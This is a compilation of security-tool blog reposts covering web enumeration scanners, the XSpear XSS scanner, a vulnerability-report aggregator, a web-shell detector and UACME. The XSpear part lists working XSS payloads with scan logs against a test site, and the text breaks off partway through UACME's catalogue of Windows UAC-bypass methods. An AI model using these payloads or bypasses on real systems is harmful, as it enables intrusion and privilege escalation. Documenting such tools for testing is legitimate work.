WAES – Auto Enums Websites And Dumps Files As Result

Doing HTB or other CTFs enumeration against targets with HTTP(S) can become trivial. It can get tiresome to always run the same script/tests on every box eg. nmap, nikto, dirb and so on. A one-click on target with automatic reports coming solves the issue. Furthermore, with a script the enum process can be optimized while saving time for hacker. This is what CPH:SEC WAES or Web Auto Enum & Scanner is created for. WAES runs 4 steps of scanning against target (see more below) to optimize the time spend scanning. While multi core or multi-threaded scanning could be implemented it will almost surely get boxes to hang and so is undesirable.From current version and forward WAES will include an install script (see blow) as project moves from alpha to beta phase.WAES could have been developed in python but good bash projects are need to learn bash.WAES is currently made for CTF boxes but is moving towards online uses (see todo section)To install:1. $> git clone https://github.com/Shiva108/WAES.git2. $> cd WAES2. $> sudo ./install.shMake sure directories are set correctly in supergobuster.sh. Should be automatic with Kali & Parrot Linux.Standard directories for lists : SecLists/Discovery/Web-Content & SecLists/Discovery/Web-Content/CMSKali / Parrot directory list : /usr/share/wordlists/dirbuster/To run WAESWeb Auto Enum & Scanner – Auto enums website(s) and dumps files as result.############################################################################## Web Auto Enum & Scanner Auto enums website(s) and dumps files as result##############################################################################Usage: waes.sh -u {IP} waes.sh -h -h shows this help -u IP to test eg. -p port nummer (default=80) Example: ./waes.sh -u -p 8080Enumeration Process / MethodWAES runs ..Step 0 – Passive scan – (disabled in the current version)whatweb – aggressive modeOSIRA (same author) – looks for subdomainsStep 1 – Fast scanwafw00 – firewall detectionnmap with http-enumStep 2 – Scan – in-depthnmap – with NSE scripts: http-date,http-title,http-server-header,http-headers,http-enum,http-devframework,http-dombased-xss,http-stored-xss,http-xssed,http-cookie-flags,http-errors,http-grep,http-traceroutenmap with vulscan (CVSS 5.0+)nikto – with evasion A and all CGI dirsuniscan – all tests except stress test (qweds)Step 3 – Fuzzingsuper gobuster gobuster with multiple listsdirb with multiple listsxss scan (to come).. against target while dumping results files in report/ folder.To DoImplement domain as inputAdd XSS scanAdd SSL/TLS scanningAdd domain scansAdd golismeroAdd dirbleAdd progressbarAdd CMS detectionAdd CMS specific scansDownload WAES

Link: http://feedproxy.google.com/~r/PentestTools/~3/lznYl-dDkGU/waes-auto-enums-websites-and-dumps.html

W13Scan – Passive Security Scanner

W13scan is a proxy-based web scanner that runs on Linux/Windows/Mac systems.BeginDemoPure Python and Python version >= 3Can you use star to encourage the author ?Installpip3 install w13scanUsage## helpw13scan -h## runningw13scan -s SupportIf you want w13scan to support https, similar to BurpSuite, first need to set up a proxy server (default, then go to http://w13scan.ca to download the root certificate and trust it.Developmentfrom W13SCAN.api import Scannerscanner = Scanner(threads=20)scanner.put(“http://example.com/?post=1")scanner.run()By introducing the w13scan package, you can quickly create a scanner.Download W13Scan

Link: http://feedproxy.google.com/~r/PentestTools/~3/ChH63pCUMoU/w13scan-passive-security-scanner.html

XSpear – Powerfull XSS Scanning And Parameter Analysis Tool

XSpear is XSS Scanner on ruby gems.Key featuresPattern matching based XSS scanningDetect alert confirm prompt event on headless browser (with Selenium)Testing request/response for XSS protection bypass and reflected params Reflected ParamsFiltered test event handler HTML tag Special CharTesting Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test…)Dynamic/Static Analysis Find SQL Error patternAnalysis Security headers(CSP HSTS X-frame-options, XSS-protection etc.. )Analysis Other headers..(Server version, Content-Type, etc…)Scanning from Raw file(Burp suite, ZAP Request)XSpear running on ruby code(with Gem library)Show table base cli-report and filtered rule, testing raw query(url)Testing at selected parametersSupport output format cli json cli: summary, filtered rule(params), Raw QuerySupport Verbose level (quit / nomal / raw data)Support custom callback code to any test various attack vectorsInstallationInstall it yourself as:$ gem install XSpearOr install it yourself as (local file):$ gem install XSpear-{version}.gemAdd this line to your application’s Gemfile:gem ‘XSpear’And then execute:$ bundleDependency gemscolorize selenium-webdriver terminal-tableIf you configured it to install automatically in the Gem library, but it behaves abnormally, install it with the following command.$ gem install colorize$ gem install selenium-webdriver$ gem install terminal-tableUsage on cliUsage: xspear -u [target] -[options] [value][ e.g ]$ ruby a.rb -u ‘https://www.hahwul.com/?q=123’ –cookie=’role=admin'[ Options ] -u, –url=target_URL [required] Target Url -d, –data=POST Body [optional] POST Method Body data –headers=HEADERS [optional] Add HTTP Headers –cookie=COOKIE [optional] Add Cookie –raw=FILENAME [optional] Load raw file(e.g raw_sample.txt) -p, –param=PARAM [optional] Test paramters -b, –BLIND=URL [optional] Add vector of Blind XSS + with XSS Hunter, ezXSS, HBXSS, etc… + e.g : -b https://hahwul.xss.ht -t, –threads=NUMBER [optional] thread , default: 10 -o, –output=FILENAME [optional] Save JSON Result -v, –verbose=1~3 [optional] Show log depth + Default value: 2 + v=1 : quite mode + v=2 : show scanning log + v=3 : show detail log(req/res) -h, –help Prints this help –version Show XSpear version –update Update with onlineResult types(I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)(V)UNL: Vulnerable XSS, Checked alert/prompt/confirm with Selenium(L)OW: Low level issue(M)EDIUM: medium level issue(H)IGH: high level issueCase by CaseScanning XSS$ xspear -u “http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"json output$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1detail log$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3set thread$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30testing at selected parameters$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,testtesting blind xss$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"etc…Sample logScanning XSSxspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z" ) ( ( /( )\ ) )\())(()/( ( ) (((_)\ /(_))` ) ))\ ( /( )(__((_)(_)) /(/( /((_))(_))(()\\ \/ // __|((_)_\ (_)) ((_)_ ((_) > < \__ \| '_ \)/ -_)/ _` || '_|/_/\_\|___/| .__/ \___|\__,_||_| /> |_| \ /<{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================- / \< \> [ v1.0.7 ][*] creating a test query.[*] test query generation is complete. [149 query][*] starting test and analysis. [10 threads][I] [00:37:34] reflected ‘XsPeaR[-] [00:37:34] ‘cat’ Not reflected |XsPeaR[I] [00:37:34] [param: cat][Found SQL Error Pattern][-] [00:37:34] ‘STATIC’ not reflected[I] [00:37:34] reflected "XsPeaR[-] [00:37:34] ‘cat’ Not reflected ;XsPeaR[I] [00:37:34] reflected `XsPeaR…snip…[H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code][-] [00:37:44] ‘cat’ not reflected <img/src onerror=alert(45)>[-] [00:37:44] ‘cat’ not reflected <svg/onload=alert(45)>[-] [00:37:49] ‘cat’ not found alert/prompt/confirm event ‘"><svg/onload=alert(45)>[-] [00:37:49] ‘cat’ not found alert/prompt/confirm event ‘"><svg/onload=alert(45)>[-] [00:37:50] ‘cat’ not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">[-] [00:37:51] ‘cat’ not found alert/prompt/confirm event ‘"><svg/onload=alert(45)>[V] [00:37:51] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script> => [param: cat][triggered <script>alert(45)</script>][V] [00:37:51] found alert/prompt/confirm (45) in selenium!! ‘"><svg/onload=alert(45)> => [param: cat][triggered <svg/onload=alert(45)>][*] finish scan. the report is being generated..+—-+——-+——————+——–+——-+————————————-+——————————————–+| [ XSpear report ] || http://testphp.vulnweb.com/listproducts.php?cat=z || 2019-07-24 00:37:33 +0900 ~ 2019-07-24 00:37:51 +0900 Found 12 issues. |+—-+——-+——————+——–+——-+————————————-+——————————————–+| NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |+—-+——-+——————+——–+—- —+————————————-+——————————————–+| 0 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern || 1 | INFO | STATIC ANALYSIS | GET | – | original query | Found Server: nginx/1.4.1 || 2 | INFO | STATIC ANALYSIS | GET | – | original query | Not set HSTS || 3 | INFO | STATIC ANALYSIS | GET | – | original query | Content-Type: text/html || 4 | LOW | STATIC ANALYSIS | GET | – | original query | Not Set X-Frame-Options || 5 | MIDUM | STATIC ANALYSIS | GET | – | original query | Not Set CSP || 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter || 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern || 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code || 9 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code || 10 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> || 11 | VULN | XSS | GET | cat | ‘"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |+—-+——-+——————+——–+——-+————————————-+——————————————–+< Available Objects >[cat] param + Available Special Char: ‘ \ ` ) [ } : . { ] $ + Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange ","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove" + Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame" + Available Useful Code: "document.cookie","document.location","window.location"< Raw Query >[0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22[1] http://testphp.vulnweb.com/listproducts.php?cat=z?-[2] http://testphp.vulnweb.com/listproducts.php?cat=z?-[3] http://testphp.vulnweb.com/listproducts.p hp?cat=z?-[4] http://testphp.vulnweb.com/listproducts.php?cat=z?-[5] http://testphp.vulnweb.com/listproducts.php?cat=z?-[6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6[7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E[8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E[9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E[10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E[11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3Eto JSON$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1{"starttime":"2019-07-17 01:02:13 +0900","endtime":"2019-07-17 01:02:59 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yy%3CXsPeaR","description":"not filtered \u001b[0;34;49m<\u001b[0m"},{"id":1,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%27","description":"not filtered \u001b[0;34;49m’\u001b[0m"},{"id":2,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3E","description":"not filtered \u001b[0;34;49m>\u001b[0m"},{"id":3,"type":"INFO","issue":"REFLECTED","payload":"searchFor=yyrEfe6","description":"reflected parameter"},{"id":4,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%22","description":"not filtered \u001b[0;34;49m\"\u001b[0m"},{"id":5,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%60","description":"not filtered \u001b[0;34;49m`\u001 b[0m"},{"id":6,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3B","description":"not filtered \u001b[0;34;49m;\u001b[0m"},{"id":7,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%28","description":"not filtered \u001b[0;34;49m(\u001b[0m"},{"id":8,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7C","description":"not filtered \u001b[0;34;49m|\u001b[0m"},{"id":9,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%29","description":"not filtered \u001b[0;34;49m)\u001b[0m"},{"id":10,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7B","description":"not filtered \u001b[0;34;49m{\u001b[0m"},{"id":11,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%5B","description":"not filtered \u001b[0;34;49m[\u001b[0m"},{"id":12,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%5D","description":"not filtered \u001b[0;34;49m]\u001b[0m"},{"id":13,"type":"INFO","issue":"FILERD RULE","pay load":"searchFor=yyXsPeaR%7D","description":"not filtered \u001b[0;34;49m}\u001b[0m"},{"id":14,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3A","description":"not filtered \u001b[0;34;49m:\u001b[0m"},{"id":15,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2B","description":"not filtered \u001b[0;34;49m+\u001b[0m"},{"id":16,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR.","description":"not filtered \u001b[0;34;49m.\u001b[0m"},{"id":17,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR-","description":"not filtered \u001b[0;34;49m-\u001b[0m"},{"id":18,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2C","description":"not filtered \u001b[0;34;49m,\u001b[0m"},{"id":19,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3D","description":"not filtered \u001b[0;34;49m=\u001b[0m"},{"id":20,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Cimg%2Fsrc+onerror%3Dalert%2845%29%3E","des cription":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":21,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Csvg%2Fonload%3Dalert%2845%29%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":22,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":23,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%24","description":"not filtered \u001b[0;34;49m$\u001b[0m"}]}Usage on ruby code (gem library)require ‘XSPear’# Set optionsoptions = {}options[‘thread’] = 30options[‘cookie’] = "data=123"options[‘blind’] = "https://hahwul.xss.ht"options[‘output’] = json# Create XSpear object with url, optionss = XspearScan.new "https://www.hahwul.com?target_url", options# Scannings.runresult = s.report.to_jsonr = JSON.parse resultAdd Scanning Module1) Add makeQueryPatternmakeQueryPattern(‘type’, ‘query,’, ‘pattern’, ‘category’, "description", "callback funcion")# type: f(ilterd?) r(eflected?) x(ss?)# category i(nfo) v(uln) l(ow) m(edium) h(igh) # e.g # makeQueryPattern(‘f’, ‘XsPeaR,’, ‘XsPeaR,’, ‘i’, "not filtered "+",".blue, CallbackStringMatch)2) if other callback, write callback class override ScanCallbackFunc e.g class CallbackStringMatch < ScanCallbackFunc def run if @response.body.include? @query [true, "reflected #{@query}"] else [false, "not reflected #{@query}"] end end endParent class(ScanCallbackFunc)class ScanCallbackFunc() def initialize(url, method, query, response) @url = url @method = method @query = query @response = response # self.run end def run # override endendCommon Callback ClassCallbackXSSSeleniumCallbackErrorPatternMatchCallbackCheckHeadersCallbackStringMatchCallbackNotAdded etc…Updateif nomal user$ gem update XSpearif developers (soft)$ git pull -vif develpers (hard)$ git reset –hard HEAD; git pull -vDevelopmentAfter checking out the repo, run bin/setup to install dependencies. Then, run rake spec to run the tests. You can also run bin/console for an interactive prompt that will allow you to experiment.To install this gem onto your local machine, run bundle exec rake install. To release a new version, update the version number in version.rb, and then run bundle exec rake release, which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org.ContributingBug reports and pull requests are welcome on GitHub at https://github.com/hahwul/XSpear. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the Contributor Covenant code of conduct.Code of ConductEveryone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct.ScreenShotDownload XSpear

Link: http://feedproxy.google.com/~r/PentestTools/~3/1eiuhzEnVo4/xspear-powerfull-xss-scanning-and.html

VulnWhisperer – Create Actionable Data From Your Vulnerability Scans

Create actionable data from your vulnerability scans VulnWhisperer is a vulnerability management tool and report aggregator. VulnWhisperer will pull all the reports from the different Vulnerability scanners and create a file with a unique filename for each one, using that data later to sync with Jira and feed Logstash. Jira does a closed cycle full Sync with the data provided by the Scanners, while Logstash indexes and tags all of the information inside the report (see logstash files at /resources/elk6/pipeline/). Data is then shipped to ElasticSearch to be indexed and ends up in a visual and searchable format in Kibana with already defined dashboards.Currently SupportsVulnerability FrameworksNessus (v6/v7/v8)Qualys Web ApplicationsQualys Vulnerability ManagementOpenVAS (v7/v8/v9)Tenable.ioDetectifyNexposeInsight VMNMAPBurp SuiteOWASP ZAPMore to comeReporting FrameworksELKJiraSplunkGetting StartedFollow the install requirementsFill out the section you want to process in frameworks_example.ini file[JIRA] If using Jira, fill Jira config in the config file mentioned above.[ELK] Modify the IP settings in the Logstash files to accommodate your environment and import them to your logstash conf directory (default is /etc/logstash/conf.d/)[ELK] Import the Kibana visualizationsRun VulnwhispererNeed assistance or just want to chat? Join our slack channelRequirementsPython 2.7Vulnerability ScannerReporting System: Jira / ElasticStack 6.6Install Requirements-VulnWhisperer(may require sudo)Install OS packages requirement dependencies (Debian-based distros, CentOS don’t need it)sudo apt-get install zlib1g-dev libxml2-dev libxslt1-dev (Optional) Use a python virtualenv to not mess with host python librariesvirtualenv venv (will create the python 2.7 virtualenv)source venv/bin/activate (start the virtualenv, now pip will run there and should install libraries without sudo)deactivate (for quitting the virtualenv once you are done)Install python libraries requirementspip install -r /path/to/VulnWhisperer/requirements.txtcd /path/to/VulnWhispererpython setup.py install(Optional) If using a proxy, add proxy URL as environment variable to PATHexport HTTP_PROXY=http://example.com:8080export HTTPS_PROXY=http://example.com:8080Now you’re ready to pull down scans. (see run section)ConfigurationThere are a few configuration steps to setting up VulnWhisperer:Configure Ini fileSetup Logstash FileImport ElasticSearch TemplatesImport Kibana Dashboardsframeworks_example.ini fileRunTo run, fill out the configuration file with your vulnerability scanner settings. Then you can execute from the command line.(optional flag: -F -> provides “Fancy" log colouring, good for comprehension when manually executing VulnWhisperer)vuln_whisperer -c configs/frameworks_example.ini -s nessus orvuln_whisperer -c configs/frameworks_example.ini -s qualysIf no section is specified (e.g. -s nessus), vulnwhisperer will check on the config file for the modules that have the property enabled=true and run them sequentially.Next you’ll need to import the visualizations into Kibana and setup your logstash config. You can either follow the sample setup instructions [here](https://github.com/HASecuritySolutions/VulnWhisperer/wiki/Sample-Guide-ELK-Deployment) or go for the `docker-compose` solution we offer. Docker-composeELK is a whole world by itself, and for newcomers to the platform, it requires basic Linux skills and usually a bit of troubleshooting until it is deployed and working as expected. As we are not able to provide support for each users ELK problems, we put together a docker-compose which includes:VulnWhispererLogstash 6.6ElasticSearch 6.6Kibana 6.6The docker-compose just requires specifying the paths where the VulnWhisperer data will be saved, and where the config files reside. If ran directly after git clone, with just adding the Scanner config to the VulnWhisperer config file (/resources/elk6/vulnwhisperer.ini), it will work out of the box.It also takes care to load the Kibana Dashboards and Visualizations automatically through the API, which needs to be done manually otherwise at Kibana’s startup.For more info about the docker-compose, check on the docker-compose wiki or the FAQ.Getting StartedOur current Roadmap is as follows:Create a Vulnerability StandardMap every scanner results to the standardCreate Scanner module guidelines for easy integration of new scanners (consistency will allow #14)Refactor the code to reuse functions and enable full compatibility among modulesChange Nessus CSV to JSON (Consistency and Fix #82)Adapt single Logstash to standard and Kibana DashboardsImplement Detectify ScannerImplement Splunk Reporting/DashboardsOn top of this, we try to focus on fixing bugs as soon as possible, which might delay the development. We also very welcome PR’s, and once we have the new standard implemented, it will be very easy to add compatibility with new scanners.The Vulnerability Standard will initially be a new simple one level JSON with all the information that matches from the different scanners having standardized variable names, while maintaining the rest of the variables as they are. In the future, once everything is implemented, we will evaluate moving to an existing standard like ECS or AWS Vulnerability Schema; we prioritize functionality over perfection.Video Walkthrough — Featured on ElasticWebinarAuthorsAustin Taylor (@HuntOperator)Justin Henderson (@smapper)ContributorsQuim Montal (@qmontal)@pemontto@cybergoofDownload VulnWhisperer

Link: http://www.kitploit.com/2019/07/vulnwhisperer-create-actionable-data.html

Shellsum – A Defense Tool – Detect Web Shells In Local Directories Via Md5Sum

A defense tool – detect web shells in local directories via md5sumFeaturesFast speedLightweightBig databaseTabled outputUsagesInstallgit clone https://github.com/ManhNho/shellsum.gitchmod 755 -R shellsum/cd shellsum/pip install -r requirements.txtRunpython shellsum.pyToDoSmooth outputExport file reportModularizationBigger databaseReferenceshttps://github.com/tennc/webshellDownload Shellsum

Link: http://feedproxy.google.com/~r/PentestTools/~3/e2sVilO2ess/shellsum-defense-tool-detect-web-shells.html

UACME – Defeating Windows User Account Control

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.System Requirementsx86-32/x64 Windows 7/8/8.1/10 (client, some methods however works on server version too).Admin account with UAC set on default settings required.UsageRun executable from command line: akagi32 [Key] [Param] or akagi64 [Key] [Param]. See “Run examples" below for more info.First param is number of method to use, second is optional command (executable file name including full path) to run. Second param can be empty – in this case program will execute elevated cmd.exe from system32 folder.Keys (watch debug output with dbgview or similar for more info):Author: Leo Davidson Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): cryptbase.dllImplementation: ucmStandardAutoElevationWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: sysprep.exe hardened LoadFrom manifest elementsAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): ShCore.dllImplementation: ucmStandardAutoElevationWorks from: Windows 8.1 (9600)Fixed in: Windows 10 TP (> 9600) How: Side effect of ShCore.dll moving to \KnownDllsAuthor: Leo Davidson derivative by WinNT/Pitou Type: Dll HijackMethod: IFileOperationTarget(s): \system32\oobe\setupsqm.exeComponent(s): WdsCore.dllImplementation: ucmStandardAutoElevationWorks from: Windows 7 (7600)Fixed in: Windows 10 TH2 (10558) How: Side effect of OOBE redesignAuthor: Jon Ericson, WinNT/Gootkit, mzH Type: AppCompatMethod: RedirectEXE ShimTarget(s): \system32\cliconfg.exeComponent(s): -Implementation: ucmShimRedirectEXEWorks from: Windows 7 (7600)Fixed in: Windows 10 TP (> 9600) How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versionsAuthor: WinNT/Simda Type: Elevated COM interfaceMethod: ISecurityEditorTarget(s): HKLM registry keysComponent(s): -Implementation: ucmSimdaTurnOffUacWorks from: Windows 7 (7600)Fixed in: Windows 10 TH1 (10147) How: ISecurityEditor interface method changedAuthor: Win32/Carberp Type: Dll HijackMethod: WUSATarget(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exeComponent(s): WdsCore.dll, CryptBase.dll, CryptSP.dllImplementation: ucmWusaMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH1 (10147) How: WUSA /extract option removedAuthor: Win32/Carberp derivative Type: Dll HijackMethod: WUSATarget(s): \system32\cliconfg.exeComponent(s): ntwdblib.dllImplementation: ucmWusaMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH1 (10147) How: WUSA /extract option removedAuthor: Leo Davidson derivative by Win32/Tilon Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): Actionqueue.dllImplementation: ucmStandardAutoElevationWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: sysprep.exe hardened LoadFrom manifestAuthor: Leo Davidson, WinNT/Simda, Win32/Carberp derivative Type: Dll HijackMethod: IFileOperation, ISecurityEditor, WUSATarget(s): IFEO registry keys, \system32\cliconfg.exeComponent(s): Attacker defined Application Verifier DllImplementation: ucmAvrfMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH1 (10147) How: WUSA /extract option removed, ISecurityEditor interface method changedAuthor: WinNT/Pitou, Win32/Carberp derivative Type: Dll HijackMethod: IFileOperation, WUSATarget(s): \system32\{New}or{Existing}\{autoelevated}.exe, e.g. winsat.exeComponent(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dllImplementation: ucmWinSATMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH2 (10548) How: AppInfo elevated application path control hardeningAuthor: Jon Ericson, WinNT/Gootkit, mzH Type: AppCompatMethod: Shim Memory PatchTarget(s): \system32\iscsicli.exeComponent(s): Attacker prepared shellcodeImplementation: ucmShimPatchWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versionsAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): dbgcore.dllImplementation: ucmStandardAutoElevationWorks from: Windows 10 TH1 (10240)Fixed in: Windows 10 TH2 (10565) How: sysprep.exe manifest updatedAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\mmc.exe EventVwr.mscComponent(s): elsext.dllImplementation: ucmMMCMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14316) How: Missing dependency removedAuthor: Leo Davidson, WinNT/Sirefef derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system\credwiz.exe, \system32\wbem\oobe.exeComponent(s): netutils.dllImplementation: ucmSirefefMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH2 (10548) How: AppInfo elevated application path control hardeningAuthor: Leo Davidson, Win32/Addrop, Metasploit derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\cliconfg.exeComponent(s): ntwdblib.dllImplementation: ucmGenericAutoelevationWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14316) How: Cliconfg.exe autoelevation removedAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exeComponent(s): SLC.dllImplementation: ucmGWXWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14316) How: AppInfo elevated application path control and inetmgr executable hardeningAuthor: Leo Davidson derivative Type: Dll Hijack (Import forwarding)Method: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): unbcl.dllImplementation: ucmStandardAutoElevation2Works from: Windows 8.1 (9600)Fixed in: Windows 10 RS1 (14371) How: sysprep.exe manifest updatedAuthor: Leo Davidson derivative Type: Dll Hijack (Manifest)Method: IFileOperationTarget(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest)Component(s): Attacker definedImplementation: ucmAutoElevateManifestWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14371) How: Manifest parsing logic reviewedAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\inetsrv\inetmgr.exeComponent(s): MsCoree.dllImplementation: ucmInetMgrMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14376) How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32ImagesAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\mmc.exe, Rsop.mscComponent(s): WbemComn.dllImplementation: ucmMMCMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS3 (16232) How: Target requires wbemcomn.dll to be signed by MSAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperation, SxS DotLocalTarget(s): \system32\sysprep\sysprep.exeComponent(s): comctl32.dllImplementation: ucmSXSMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS3 (16232) How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32ImagesAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperation, SxS DotLocalTarget(s): \system32\consent.exeComponent(s): comctl32.dllImplementation: ucmSXSMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\pkgmgr.exeComponent(s): DismCore.dllImplementation: ucmDismMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: BreakingMalware Type: Shell APIMethod: Environment variables expansionTarget(s): \system32\CompMgmtLauncher.exeComponent(s): Attacker definedImplementation: ucmCometMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS2 (15031) How: 